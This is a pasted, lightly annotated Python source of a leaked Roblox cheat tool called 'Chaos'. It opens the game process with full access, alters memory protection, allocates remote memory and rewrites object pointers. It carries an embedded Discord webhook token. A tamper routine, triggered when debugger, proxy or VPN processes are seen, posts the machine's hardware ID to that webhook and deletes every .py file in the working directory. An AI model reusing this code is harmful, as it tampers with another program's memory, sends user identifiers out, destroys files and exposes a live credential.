
chaos v3 beta leak source fix error yourself

Apr 4th, 2024 (edited)
  1. # Protected by PyAntiSkid
  2. #If you are reading this, you are probably a skid
  3. #Good luck deobfing this, skid!
  4. from pystyle import Colors, Colorate
  5. import ctypes
  6. import random
  7. import string
  8. import pymem
  9. import time
  10. import re
  11. import os
  12. import psutil
  13. import subprocess
  14. import threading
  15. import requests
  16. import hashlib
  17. import urllib
  18. import glob
  19. import json
  20. import requests
  21. import ssl
  22. from requests.adapters import HTTPAdapter
  23. from requests.packages.urllib3.poolmanager import PoolManager
  24. import tempfile
  25.  
  26. cert = """
  27. -----BEGIN CERTIFICATE-----
  28. MIIE4TCCA8mgAwIBAgISAwmt592pmLYBVax/P+51AGDNMA0GCSqGSIb3DQEBCwUA
  29. MDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQD
  30. EwJSMzAeFw0yNDA0MDIxNTQ5MzVaFw0yNDA3MDExNTQ5MzRaMBUxEzARBgNVBAMT
  31. CmJ5ZnJvbi5sb2wwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCoVVy/
  32. Lh8usb0nwz6resMIuAbO/0qjRjyeZU8WWc2ofzEejiLtH2fGxKaqVe0M5Ca50Ztk
  33. MQSgdK8D2OzKTRW3jRoAVocWCAB5NHVuesHn4PHnSL5mVd6nEkUHjvqdNJDEI6pe
  34. GEfcOBvyxA+aafYJWL+nKXvCEBOWh349XkzAxB4reiTNqBowumk00hwIseMYmTY+
  35. FSdepDNzHo1XGJmNNba+m58MaqYUzSK+qqzHpBe1uwixjp1PCuaJTVMz0ycrn/Tb
  36. 7TQgks23hJvQoJiMdATq/tua35DjkfVCFRGmafaZQYsWT0mO+HgYoffibaHUEbPu
  37. 4vpF6wACzhgHJigRAgMBAAGjggIMMIICCDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0l
  38. BBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYE
  39. FKAXfi5DYq+IvhG+puMA/5aWCHWPMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYf
  40. r52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8u
  41. bGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMBUG
  42. A1UdEQQOMAyCCmJ5ZnJvbi5sb2wwEwYDVR0gBAwwCjAIBgZngQwBAgEwggEEBgor
  43. BgEEAdZ5AgQCBIH1BIHyAPAAdgDf4VbrqgWvtZwPhnGNqMAyTq5W2W6n9aVqAdHB
  44. O75SXAAAAY6ft1MRAAAEAwBHMEUCIAfFaEx0FFSyHKpihRtfL2p2Uzj80nSSZ9MQ
  45. Qh241GIVAiEAu/zFbuobWRAKQHhQvq2XupDu12SnOXdscD2qF/iz1c4AdgBIsONr
  46. 2qZHNA/lagL6nTDrHFIBy1bdLIHZu7+rOdiEcwAAAY6ft1P+AAAEAwBHMEUCICod
  47. L89ZnhQPFAAqsurfYcWo2jp5v7mQNFb0Ozde8ILbAiEAxeciEYDhSdWp09L9epli
  48. sR86PigGnSU6UllYjrnb8jQwDQYJKoZIhvcNAQELBQADggEBALFUVi1ij6xOEzXn
  49. RqOxKJ5d8yNfYNYQJD1tFgQwtSUAhV/KhkCdxw/7AF4QsFcvifMAifTQH7DjxUII
  50. a0WfwsbpEmdvJ1rEVpNJY2FrDK54JgsAQqvDvHPpN9f6U3ruF3vq9TkVjlBFmhns
  51. Vsg2+APwtpzHTkqI6ln5QI5Ag0OLAzUXseIyhTZlgOkW7Hj4LcgWXp4Yp3dRQ8p3
  52. SW85IA4lM5Xa7jz29ApejyxvSGfCgO1GNlAwULfqEqHcVT3nixdgJWE1bvEltzc7
  53. ODVbXn7HXJnAMAEytELRhrWnO+cR1HdIJkXsnaWR9e6m5TC2fXpGmK4C/bogAx2u
  54. mD9vASc=
  55. -----END CERTIFICATE-----
  56. """
  57.  
class SSLAdapter(HTTPAdapter):
    """Transport adapter that trusts only the certificate text it is given.

    The PEM text is written to a temporary file and that file's path is
    handed to urllib3 as ``ca_certs`` for the pool manager this adapter
    builds, so it replaces the system trust store for mounted URLs.
    """

    def __init__(self, cert_content):
        """Persist *cert_content* to a temp file, then set up the adapter.

        Args:
            cert_content: PEM text to use as the only trust anchor.
        """
        # The file is created before the base initialiser runs because
        # init_poolmanager() below needs ``self.cert_file``.
        # NOTE(review): the file is opened with delete=True and kept open;
        # the tempfile docs say such a file cannot always be reopened by
        # name on Windows -- confirm the pinning actually loads there.
        pem_file = tempfile.NamedTemporaryFile(delete=True)
        pem_file.write(cert_content.encode())
        pem_file.flush()
        self.cert_file = pem_file
        super().__init__()

    def init_poolmanager(self, connections, maxsize, block=False):
        """Build the urllib3 pool manager with certificate checking enabled."""
        # NOTE(review): ssl.PROTOCOL_TLSv1_2 selects TLS 1.2 only and is
        # deprecated since Python 3.10; a minimum-version setting would
        # allow TLS 1.3 as well.
        pool_options = {
            "num_pools": connections,
            "maxsize": maxsize,
            "block": block,
            "ssl_version": ssl.PROTOCOL_TLSv1_2,
            "cert_reqs": 'CERT_REQUIRED',
            "ca_certs": self.cert_file.name,  # path of the pinned PEM file
        }
        self.poolmanager = PoolManager(**pool_options)
  72.  
# Raise this process to the Windows HIGH priority class.
p = psutil.Process(os.getpid())
p.nice(psutil.HIGH_PRIORITY_CLASS)
# A `global` statement at module scope has no effect; `selector` is
# assigned further down, after the key check.
global selector
# Build identifier that checkleak() sends to the version endpoint.
thisver = "beta_0438"
def tamperdetected():
    """Report this machine to a Discord webhook, delete local ``*.py`` files, exit.

    Invoked by the other checks in this file (checkleak, checkproxy,
    check_processes) when they decide the copy is leaked or being analysed.
    """
    # NOTE(review): the webhook token is embedded in the URL, so it is a
    # leaked secret for anyone holding this source, and the URL is a
    # network indicator for this sample.
    webhook = "https://discord.com/api/webhooks/1225098688154832987/GkYCaZCmLGYFosGq0rxWUxKkyuwj-ld2o_vaRby8UgLNgkdXNGagzUhFNkn99HzJz22s"
    # Second line of the `wmic csproduct get uuid` output, used as a
    # hardware identifier for the machine.
    hw = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
    embed = {
        "title": "Tamper Detected",
        "description": f"***IP:***``` Getting Ip is disabled```\n**HWID:***```{hw}```",
        "color": 16711680 # Red color
    }
    # The hardware ID leaves the machine here. No timeout and no error
    # handling: if the POST raises, the lines below never run.
    requests.post(webhook, json={"embeds": [embed]})
    print(f"\nYou have won free Chaos beta, DM byfronlol on Discord with your unique ID: ", ran)
    # destroy the file
    # NOTE(review): this removes every .py file in the current working
    # directory, not just this script -- destructive for whoever runs it.
    cwd = os.getcwd()
    py_files = glob.glob(os.path.join(cwd, '*.py'))
    for file in py_files:
        os.remove(file)
    exit()
  93.  
def checkleak():
    """Ask the version endpoint about ``thisver`` and act on a leak verdict.

    When the JSON reply's ``message`` field equals ``'404 | Leaker found'``
    the tamper handler runs; any other reply is ignored. The request goes
    through plain ``requests.get`` (no pinned adapter, no timeout).
    """
    endpoint = "https://byfron.lol/api/version?version=" + thisver
    reply = requests.get(endpoint).json()
    verdict = reply.get('message')
    if verdict == '404 | Leaker found':
        tamperdetected()
def randomstrings():
    """Return ten random lowercase ASCII letters.

    Drawn from the ``random`` module, so the value is an identifier for
    display only and must not be treated as a secret.
    """
    alphabet = string.ascii_lowercase
    picked = []
    for _ in range(10):
        picked.append(random.choice(alphabet))
    return ''.join(picked)


# Per-run identifier that tamperdetected() prints.
ran = randomstrings()
  102.  
def checkproxy():
    """Return False when no proxy is configured, else trip the tamper handler.

    Returns:
        False if ``urllib.request.getproxies()`` is empty. Otherwise
        ``tamperdetected()`` is called first and True is returned only if
        that call comes back.
    """
    # NOTE(review): the file only does `import urllib`; this attribute
    # access works only if urllib.request was imported elsewhere.
    proxies = urllib.request.getproxies()
    if proxies == {}:
        return False
    tamperdetected()
    return True
  110.  
  111.  
  112.  
  113.  
  114.  
  115. import time
  116.  
def check_processes(process_names):
    """Poll the process list forever and call tamperdetected() on a name match.

    Args:
        process_names: lowercase substrings looked for in each running
            process's name.
    """
    while True:
        for process in psutil.process_iter(['name']):
            #get every process
            for name in process_names:
                #for every blacklisted name
                # NOTE(review): this is a substring test, so short entries
                # such as "ida" or "vpn" also match unrelated process
                # names; a hit leads to tamperdetected(), which deletes
                # files. psutil may report a name of None for some
                # processes, which would raise here -- TODO confirm.
                if name in process.info['name'].lower():
                    #if name is in the process info
                    # print("tamper found!!!") # debug
                    #then flag
                    tamperdetected()

        time.sleep(1) # pause for 1 second
  130.  
# Name fragments the watcher thread looks for in running processes; they
# cover debuggers, disassemblers, proxy/VPN tools and similar utilities.
processes_to_check = ["gdb", "debug", "dbg", "proxy", "ida", "fiddle", "dnspy", "socks", "vpn", "psiphon", "ultrasurf", "ghidra", "compile", "spoof", "woof"]
# Non-daemon thread around an endless loop: it keeps the interpreter alive
# until the process is ended by exit()/os._exit().
t = threading.Thread(target=check_processes, args=(processes_to_check,))
t.start()
  134.  
  135. os.system("cls")
  136. banner = """
  137.  
  138. ░█████╗░██╗░░██╗░█████╗░░█████╗░░██████╗██████╗░░█████╗░██╗░░░░░██╗████████╗ [Version]: Beta V3
  139. ██╔══██╗██║░░██║██╔══██╗██╔══██╗██╔════╝██╔══██╗██╔══██╗██║░░░░░██║╚══██╔══╝ [Deafult]: [RobloxPlayerBeta.exe]
  140. ██║░░╚═╝███████║███████║██║░░██║╚█████╗░██████╔╝██║░░██║██║░░░░░██║░░░██║░░░ [1] WEB
  141. ██║░░██╗██╔══██║██╔══██║██║░░██║░╚═══██╗██╔═══╝░██║░░██║██║░░░░░██║░░░██║░░░ [2] UWP
  142. ╚█████╔╝██║░░██║██║░░██║╚█████╔╝██████╔╝██║░░░░░╚█████╔╝███████╗██║░░░██║░░░
  143. ░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═════╝░╚═╝░░░░░░╚════╝░╚══════╝╚═╝░░░╚═╝░░░ """
  144. print(Colorate.Horizontal(Colors.purple_to_blue, banner, 1))
  145.  
  146.  
def colorprint(text):
    """Print *text* using the cyan-to-blue horizontal gradient."""
    styled = Colorate.Horizontal(Colors.cyan_to_blue, text)
    print(styled)
  149.  
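def checkkey():
    """Prompt for a licence key and validate it against the key API.

    The key typed by the user and the machine's hardware ID are sent to the
    key endpoint through a session that uses the pinned ``SSLAdapter``.

    Returns:
        True when the server reports the key as valid, False for every
        other outcome (mismatch, unknown key, malformed or unexpected
        reply).
    """
    url = "https://byfron.lol/api/keyids"
    key = input(Colorate.DiagonalBackwards(Colors.cyan_to_blue, "Enter your key: ", 1))
    # Second line of the `wmic csproduct get uuid` output.
    hw = subprocess.check_output('wmic csproduct get uuid').decode().split('\n')[1].strip()
    session = requests.Session()
    session.mount(url, SSLAdapter(cert))
    # Let requests build the query string: characters such as '&', '#' or
    # spaces typed at the prompt are percent-encoded instead of changing
    # the shape of the request.
    # NOTE(review): key and hardware ID still travel in the URL, where
    # server and proxy logs usually record them.
    r = session.get(url=url, params={"keyid": key, "hwid": hw})
    try:
        response_data = json.loads(r.text)
    except ValueError:
        # Non-JSON body (error page, empty reply): treat as "not valid".
        print("Unexpected response from the key server")
        return False
    if not isinstance(response_data, dict):
        print(response_data)
        return False

    status = response_data.get('status')
    message = response_data.get('message')
    if not isinstance(message, str):
        # A missing or non-text message can never match the cases below.
        message = ''

    if status == 'error' and message == '403 | Blocked - HWID does not match':
        print("Your HWID doesn't match the key HWID")
        return False
    if status == 'error' and message == '404 | Key ID not found':
        print("Key expired or not found in the database")
        return False
    if status == 'success' and 'Key ID is valid' in message:
        return True
    # Unknown reply: show it and fail closed with an explicit False.
    print(response_data)
    return False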
  169.  
# Licence gate: nothing below runs unless the key check succeeded.
if not checkkey():
    os.system("cls")
    print(Colorate.Horizontal(Colors.purple_to_blue, banner, 1))
    print("Invalid Key Get It From: https://byfron.lol/")
    exit()

os.system("cls")
print(Colorate.Horizontal(Colors.purple_to_blue, banner, 1))
print(Colorate.Horizontal(Colors.cyan_to_blue, "Valide Key",1))
selectorsec = input(Colorate.Horizontal(Colors.cyan_to_blue, "\nSelect the Roblox version you want to use: ", 1))
# "2" picks the UWP client image; any other answer keeps the default one.
selector = "Windows10Universal.exe" if selectorsec == "2" else "RobloxPlayerBeta.exe"
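def CloseRBLX():
    """Terminate the selected client process, or exit if it is not running.

    Looks the image name in ``selector`` up through
    ``ChaoSpolit.YieldForProgram`` and, when found, asks ``taskkill`` to
    end it by image name.
    """
    roblox_processes = ChaoSpolit.YieldForProgram(f"{selector}")
    if not roblox_processes:
        # The original literal lacked the f prefix, so it printed the text
        # "{selector}" instead of the image name.
        print(f"/\\{selector} was not found")
        exit()
    # Argument list instead of a shell string, so the image name is never
    # interpreted by cmd.exe.
    subprocess.run(["taskkill", "/im", selector])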
  195.  
  196. os.system("cls" if os.name == "nt" else "clear")
  197.  
  198. # This is a flag that the thread will check to see if it should stop
  199. stop_thread = False
  200.  
def undetectname():# silly bypass
    """Keep renaming the console window to random 40-letter titles.

    Runs until the module-level ``stop_thread`` flag becomes true.
    """
    global stop_thread
    while not stop_thread:
        letters = string.ascii_lowercase
        appname = ''.join(random.choice(letters) for _ in range(40))
        # Analyst note: the loop has no sleep, so it spins a core while
        # calling SetConsoleTitleW; a console whose title changes
        # constantly is an observable trait of this sample.
        ctypes.windll.kernel32.SetConsoleTitleW(appname)
  207.  
  208.  
  209.  
def init():
    """Fetch the published version marker and exit unless it is "1".

    The reply body is expected to look like ``[1]``; its first and last
    characters are dropped before the comparison. The request uses plain
    ``requests.get`` with no timeout.
    """
    url = "https://capi-3ns5.onrender.com/latestversion"# i am dumb
    reply = requests.get(url=url)
    res = reply.text[1:-1]
    if res != "1":
        print(Colorate.Horizontal(Colors.cyan_to_blue, "Update Soon Please Join: https://discord.gg/chaosploit...", 1))
        exit()
    print(Colorate.Horizontal(Colors.cyan_to_blue, f"Latest Version : {res}..."))
    print(Colorate.Horizontal(Colors.cyan_to_blue, "Discord: https://discord.gg/chaosploit...", 1))
  226.  
  227.  
  228. init()
  229.  
  230. class ChaoSpolit:
  231. def __init__(self, program_name):
  232. self.program_name = program_name
  233.  
  234. def SimpleGetProcesses(self):
  235. return [proc.name() for proc in psutil.process_iter(["name"])]
  236.  
  237. def SetParent(self, Instance, Parent, parentOffset):
  238. ChaoSpolit.Pymem.write_longlong(Instance + parentOffset, Parent)
  239.  
    def __init__(self, ProgramName=None):# init
        """Create the wrapper and optionally attach to a process.

        Args:
            ProgramName: a str attaches by image name, an int attaches by
                process ID, anything else leaves the wrapper unattached.
        """
        self.ProgramName = ProgramName
        self.Pymem = pymem.Pymem()
        self.Addresses = {}
        self.Handle = None
        self.is64bit = True
        self.ProcessID = None
        self.PID = self.ProcessID

        # Exact type checks are kept on purpose (a bool is not treated as
        # a process ID).
        if type(ProgramName) == str:
            self.Pymem = pymem.Pymem(ProgramName)
        elif type(ProgramName) == int:
            self.Pymem.open_process_from_id(ProgramName)
        else:
            return

        # Both attach paths record the same process details.
        self.Handle = self.Pymem.process_handle
        self.is64bit = pymem.process.is_64_bit(self.Handle)
        self.ProcessID = self.Pymem.process_id
        self.PID = self.ProcessID
  260.  
    def h2d(self, hz: str, bit: int = 16) -> int:
        """Convert a numeric string to an int; ints pass through unchanged.

        Args:
            hz: text to parse, or an int that is returned as is.
            bit: base handed to ``int()`` (16 by default).

        Returns:
            The parsed integer.
        """
        return hz if type(hz) == int else int(hz, bit)
  265.  
    def d2h(self, dc: int, UseAuto=None) -> str:
        """Format an integer as zero-padded lowercase hex without "0x".

        Args:
            dc: value to format; a str is returned unchanged.
            UseAuto: 32 forces a 32-bit mask, any other truthy value a
                64-bit mask; when falsy the width follows the magnitude
                of *dc*.

        Returns:
            8 hex digits, or 16 when the masked value needs more than 8.
        """
        if type(dc) == str:
            return dc
        if UseAuto:
            width_bits = 32 if UseAuto == 32 else 64
        else:
            width_bits = 64 if abs(dc) > 4294967295 else 32
        # Masking gives negative inputs their two's-complement form.
        digits = hex(dc & (2**width_bits - 1)).replace("0x", "")
        target_len = 16 if len(digits) > 8 else 8
        return digits.rjust(target_len, "0")
  286.  
    def PLAT(self, aob: str):
        """Turn a hex pattern string into a bytes regular expression.

        Spaces are ignored and the text is read two characters at a time.
        A pair containing "?" becomes the regex wildcard ``.``; any other
        pair is decoded from hex and regex-escaped.

        Args:
            aob: hex pattern text, or bytes that are returned unchanged.

        Returns:
            The pattern as bytes.
        """
        if type(aob) == bytes:
            return aob
        compact = aob.replace(" ", "")
        pieces = (compact[pos : pos + 2] for pos in range(0, len(compact), 2))
        return b"".join(
            b"." if "?" in piece else re.escape(bytes.fromhex(piece))
            for piece in pieces
        )
  301.  
    def AOBSCANALL(self, AOB_HexArray, xreturn_multiple=False):
        """
        Scan the attached process for an AOB (array-of-bytes) pattern.

        Parameters:
        AOB_HexArray (str | bytes): The pattern, as a hex string in which "??"
            marks a wildcard byte, or as ready-made bytes (see PLAT).
        xreturn_multiple (bool): Passed to pymem as ``return_multiple``.

        Returns:
        Whatever ``pymem.pattern.pattern_scan_all`` returns, or None when the
        fallback path below ends without reaching a ``return``.
        """
        try:
            # Open the process with the appropriate access rights
            # Analyst note: a full-access handle (0x1F0FFF) to another
            # process is requested on every scan and stored over the
            # previous one; no CloseHandle call appears in this method.
            ChaoSpolit.Pymem.process_handle = ctypes.windll.kernel32.OpenProcess(
                0x1F0FFF, # PROCESS_ALL_ACCESS
                False, # False = do not inherit handles
                ChaoSpolit.Pymem.process_id,
            )

            # Define necessary ChaoSpolit functions
            PAGE_EXECUTE_READWRITE = 0x40
            ntdll = ctypes.windll.ntdll
            NtProtectVirtualMemory = ntdll.NtProtectVirtualMemory
            NtProtectVirtualMemory.restype = ctypes.c_long

            # Get the base address of the process
            # NOTE(review): per the Win32 docs GetModuleHandleW(None) returns
            # the image base of the *calling* process, so this address is
            # not read from the target -- confirm what was intended.
            base_address = ctypes.windll.kernel32.GetModuleHandleW(None)

            # Remove read/write protection from the process memory
            # One 0x1000-byte page is switched to read/write/execute; the
            # NTSTATUS result is not checked.
            old_protect = ctypes.c_ulong()
            size = ctypes.c_size_t(0x1000)
            NtProtectVirtualMemory(
                ChaoSpolit.Pymem.process_handle,
                ctypes.byref(ctypes.c_void_p(base_address)),
                ctypes.byref(size),
                PAGE_EXECUTE_READWRITE,
                ctypes.byref(old_protect),
            )

            # Get the base address of the process again (after removing read/write protection)
            base_address = ctypes.windll.kernel32.GetModuleHandleW(None)

            # Re-enable read/write protection for the process memory
            # The saved protection value is put back before the scan runs.
            NtProtectVirtualMemory(
                ChaoSpolit.Pymem.process_handle,
                ctypes.byref(ctypes.c_void_p(base_address)),
                ctypes.byref(size),
                old_protect,
                ctypes.byref(ctypes.c_ulong()),
            )

            # Now attempt the pattern scan
            return pymem.pattern.pattern_scan_all(
                self.Pymem.process_handle,
                self.PLAT(AOB_HexArray),
                return_multiple=xreturn_multiple,
            )
        except Exception as e:
            print(f"WinAPI Error: {e}")
            # Let's try bypassing read/write protection first.
            # The fallback repeats the same sequence as the block above.
            try:
                ChaoSpolit.Pymem.process_handle = ctypes.windll.kernel32.OpenProcess(
                    0x1F0FFF, # PROCESS_ALL_ACCESS
                    False, # False = do not inherit handles
                    ChaoSpolit.Pymem.process_id,
                )

                # Define necessary ChaoSpolit functions
                PAGE_EXECUTE_READWRITE = 0x40
                ntdll = ctypes.windll.ntdll
                NtProtectVirtualMemory = ntdll.NtProtectVirtualMemory
                NtProtectVirtualMemory.restype = ctypes.c_long

                # Get the base address of the process
                base_address = ctypes.windll.kernel32.GetModuleHandleW(None)

                # Remove read/write protection from the process memory
                old_protect = ctypes.c_ulong()
                size = ctypes.c_size_t(0x1000)
                NtProtectVirtualMemory(
                    ChaoSpolit.Pymem.process_handle,
                    ctypes.byref(ctypes.c_void_p(base_address)),
                    ctypes.byref(size),
                    PAGE_EXECUTE_READWRITE,
                    ctypes.byref(old_protect),
                )

                # Get the base address of the process again (after removing read/write protection)
                base_address = ctypes.windll.kernel32.GetModuleHandleW(None)

                # Re-enable read/write protection for the process memory
                NtProtectVirtualMemory(
                    ChaoSpolit.Pymem.process_handle,
                    ctypes.byref(ctypes.c_void_p(base_address)),
                    ctypes.byref(size),
                    old_protect,
                    ctypes.byref(ctypes.c_ulong()),
                )

                # Now attempt the pattern scan
                return pymem.pattern.pattern_scan_all(
                    self.Pymem.process_handle,
                    self.PLAT(AOB_HexArray),
                    return_multiple=xreturn_multiple,
                )
            except WindowsError as we:
                # winerror 5 is ERROR_ACCESS_DENIED; the same sequence is
                # tried a third time. Any other Windows error is dropped
                # silently and the method returns None.
                if we.winerror == 5:
                    ChaoSpolit.Pymem.process_handle = ctypes.windll.kernel32.OpenProcess(
                        0x1F0FFF, # PROCESS_ALL_ACCESS
                        False, # False = do not inherit handles
                        ChaoSpolit.Pymem.process_id,
                    )

                    # Define necessary ChaoSpolit functions
                    PAGE_EXECUTE_READWRITE = 0x40
                    ntdll = ctypes.windll.ntdll
                    NtProtectVirtualMemory = ntdll.NtProtectVirtualMemory
                    NtProtectVirtualMemory.restype = ctypes.c_long

                    # Get the base address of the process
                    base_address = ctypes.windll.kernel32.GetModuleHandleW(None)

                    # Remove read/write protection from the process memory
                    old_protect = ctypes.c_ulong()
                    size = ctypes.c_size_t(0x1000)
                    NtProtectVirtualMemory(
                        ChaoSpolit.Pymem.process_handle,
                        ctypes.byref(ctypes.c_void_p(base_address)),
                        ctypes.byref(size),
                        PAGE_EXECUTE_READWRITE,
                        ctypes.byref(old_protect),
                    )

                    # Get the base address of the process again (after removing read/write protection)
                    base_address = ctypes.windll.kernel32.GetModuleHandleW(None)

                    # Re-enable read/write protection for the process memory
                    NtProtectVirtualMemory(
                        ChaoSpolit.Pymem.process_handle,
                        ctypes.byref(ctypes.c_void_p(base_address)),
                        ctypes.byref(size),
                        old_protect,
                        ctypes.byref(ctypes.c_ulong()),
                    )

                    # Now attempt the pattern scan
                    return pymem.pattern.pattern_scan_all(
                        self.Pymem.process_handle,
                        self.PLAT(AOB_HexArray),
                        return_multiple=xreturn_multiple,
                    )
            except Exception as e:
                # The exception text is not included in the message, and
                # the method falls through to an implicit None.
                print(f"Unknown error: ")
  455.  
  456.  
    def hex2le(self, hex: str):
        """Reverse the byte order of a hex string.

        Spaces are removed, the text is left-padded with "0" to 8 digits
        (16 when it already has more than 8), split into two-character
        pairs, and the pairs are returned in reverse order.

        Args:
            hex: hex digits, optionally separated by spaces.

        Returns:
            The pairs joined in reversed order.
        """
        digits = hex.replace(" ", "")
        width = 16 if len(digits) > 8 else 8
        digits = digits.rjust(width, "0")
        pairs = [digits[pos : pos + 2] for pos in range(0, len(digits), 2)]
        return "".join(reversed(pairs))
  474.  
  475.  
  476. def isProgramGameActive(self):
  477. try:
  478. self.Pymem.read_char(self.Pymem.base_address)
  479. return True
  480. except:
  481. return False
  482.  
  483. def DRP(self, Address: int, is64Bit: bool = None) -> int:
  484. Address = Address
  485. if type(Address) == str:
  486. Address = self.h2d(Address)
  487. if is64Bit:
  488. return int.from_bytes(self.Pymem.read_bytes(Address, 8), "little")
  489. if self.is64bit:
  490. return int.from_bytes(self.Pymem.read_bytes(Address, 8), "little")
  491. return int.from_bytes(self.Pymem.read_bytes(Address, 4), "little")
  492.  
  493.  
    def getRawProcesses(self):
        """List every process pymem reports as a row of ten raw fields.

        Returns:
            One list per process, holding the entry's fields in this
            order: cntThreads, cntUsage, dwFlags, dwSize, pcPriClassBase,
            szExeFile, th32DefaultHeapID, th32ModuleID,
            th32ParentProcessID, th32ProcessID.
        """
        return [
            [
                entry.cntThreads,
                entry.cntUsage,
                entry.dwFlags,
                entry.dwSize,
                entry.pcPriClassBase,
                entry.szExeFile,
                entry.th32DefaultHeapID,
                entry.th32ModuleID,
                entry.th32ParentProcessID,
                entry.th32ProcessID,
            ]
            for entry in pymem.process.list_processes()
        ]
  512.  
  513. def SimpleGetProcesses(self):
  514. toreturn = []
  515. for i in self.getRawProcesses():
  516. toreturn.append({"Name": i[5].decode(), "Threads": i[0], "ProcessId": i[9]})
  517. return toreturn
  518.  
  519. def YieldForProgram(self, programName, AutoOpen: bool = False, Limit=1):
  520. Count = 0
  521. while True:
  522. if Count >= Limit:
  523. return False
  524. ProcessesList = self.SimpleGetProcesses()
  525. for i in ProcessesList:
  526. if i["Name"] == programName:
  527.  
  528. if AutoOpen:
  529. self.Pymem.open_process_from_id(i["ProcessId"])
  530. self.ProgramName = programName
  531. self.Handle = self.Pymem.process_handle
  532. self.is64bit = pymem.process.is_64_bit(self.Handle)
  533. self.ProcessID = self.Pymem.process_id
  534. self.PID = self.ProcessID
  535. return True
  536. time.sleep(1)
  537. Count += 1
  538.  
  539.  
  540.  
  541.  
# Rebinds the class name to a single unattached instance; from here on
# `ChaoSpolit` refers to that object and the class is no longer reachable
# by name.
ChaoSpolit = ChaoSpolit()


print(Colorate.Horizontal(Colors.cyan_to_blue, f"Waiting for {selector}", 1))
# Each YieldForProgram call polls up to 15 times, one second apart; the
# outer loop repeats until the client is found and opened (AutoOpen=True).
while True:
    if ChaoSpolit.YieldForProgram(f"{selector}", True, 15):
        break
  549.  
  550.  
  551.  
def ReadRobloxString(ExpectedAddress: int) -> str:
    """Read a string object from the attached process.

    The length is the int at ``ExpectedAddress + 0x10``. When it exceeds
    15 the text is read through the pointer stored at *ExpectedAddress*;
    otherwise it is read from *ExpectedAddress* itself.

    Args:
        ExpectedAddress: address of the string object.

    Returns:
        The decoded text. A TypeError is reported and ends the program.
    """
    try:
        mem = ChaoSpolit.Pymem
        # NOTE(review): the length comes from the other process and is
        # used without a bounds check.
        length = mem.read_int(ExpectedAddress + 0x10)
        source = ChaoSpolit.DRP(ExpectedAddress) if length > 15 else ExpectedAddress
        return mem.read_string(source, length)
    except TypeError as e:
        print(f"TypeError: {e} \n" + "Rsp3")
        exit()
  561.  
def GetClassName(Instance: int) -> str:
    """Return the class-name string reached from *Instance*.

    Follows the pointer at ``Instance + 0x18``, then the pointer 8 bytes
    into that structure, and reads the string found there.
    """
    descriptor = ChaoSpolit.DRP(Instance + 0x18)
    name_address = ChaoSpolit.DRP(descriptor + 8)
    return ReadRobloxString(name_address)
  565.  
def setParent(Instance, Parent, parentOffset, childrenOffset):
    """Rewrite an object's parent pointer inside the attached process.

    Writes *Parent* at ``Instance + parentOffset``, allocates 0x400 bytes in
    the target, copies the parent's current children array there and
    appends an entry for *Instance*.

    Args:
        Instance: address of the object being moved.
        Parent: address of the new parent object.
        parentOffset: offset of the parent pointer inside an object.
        childrenOffset: offset of the children pointer inside an object.
    """
    # Analyst note: this is the write primitive of the sample. From the
    # target's side it shows up as a full-access handle (0x1F0FFF), a page
    # protection change to read/write/execute, a remote allocation and
    # cross-process memory writes.
    ChaoSpolit.Pymem.process_handle = ctypes.windll.kernel32.OpenProcess(
        0x1F0FFF, # PROCESS_ALL_ACCESS
        False, # False = do not inherit handles
        ChaoSpolit.Pymem.process_id,
    )

    # Define necessary ChaoSpolit functions
    PAGE_EXECUTE_READWRITE = 0x40
    ntdll = ctypes.windll.ntdll
    NtProtectVirtualMemory = ntdll.NtProtectVirtualMemory
    NtProtectVirtualMemory.restype = ctypes.c_long

    # Get the base address of the process
    # NOTE(review): per the Win32 docs GetModuleHandleW(None) returns the
    # image base of the *calling* process, not of the target -- confirm.
    base_address = ctypes.windll.kernel32.GetModuleHandleW(None)

    # Remove read/write protection from the process memory
    # The NTSTATUS results of both protection calls are ignored.
    old_protect = ctypes.c_ulong()
    size = ctypes.c_size_t(0x1000)
    NtProtectVirtualMemory(
        ChaoSpolit.Pymem.process_handle,
        ctypes.byref(ctypes.c_void_p(base_address)),
        ctypes.byref(size),
        PAGE_EXECUTE_READWRITE,
        ctypes.byref(old_protect),
    )

    # Get the base address of the process again (after removing read/write protection)
    base_address = ctypes.windll.kernel32.GetModuleHandleW(None)

    # Re-enable read/write protection for the process memory
    NtProtectVirtualMemory(
        ChaoSpolit.Pymem.process_handle,
        ctypes.byref(ctypes.c_void_p(base_address)),
        ctypes.byref(size),
        old_protect,
        ctypes.byref(ctypes.c_ulong()),
    )

    # Parent pointer write, then a fresh 0x400-byte buffer in the target
    # whose first slot points 0x40 bytes into itself.
    ChaoSpolit.Pymem.write_longlong(Instance + parentOffset, Parent)
    newChildren = ChaoSpolit.Pymem.allocate(0x400)
    ChaoSpolit.Pymem.write_longlong(newChildren, newChildren + 0x40)

    # Start/end pointers of the parent's existing children array.
    ptr = ChaoSpolit.Pymem.read_longlong(Parent + childrenOffset)
    childrenStart, childrenEnd = ChaoSpolit.Pymem.read_longlong(ptr), ChaoSpolit.Pymem.read_longlong(ptr + 8)

    # `length` is bound by the walrus only when the first three tests are
    # false; at that point it is positive, so the "Negative length"
    # message can never be selected.
    if childrenStart == 0 or childrenEnd == 0 or childrenEnd <= childrenStart or (length := childrenEnd - childrenStart) < 0:
        print("\033[91mError: Invalid children range. Line: Rsp16\033[0m" if childrenStart == 0 or childrenEnd == 0 or childrenEnd <= childrenStart else "\033[91mError: Negative length for children array. Line: Rsp17\033[0m")
        exit()

    # Copy the existing entries, append a 16-byte entry for Instance, and
    # store the new end address in the buffer's header slots.
    b = ChaoSpolit.Pymem.read_bytes(childrenStart, length)
    ChaoSpolit.Pymem.write_bytes(newChildren + 0x40, b, len(b))
    e = newChildren + 0x40 + length
    ChaoSpolit.Pymem.write_longlong(e, Instance)
    ChaoSpolit.Pymem.write_longlong(e + 8, ChaoSpolit.Pymem.read_longlong(Instance + 0x10))
    e += 0x10
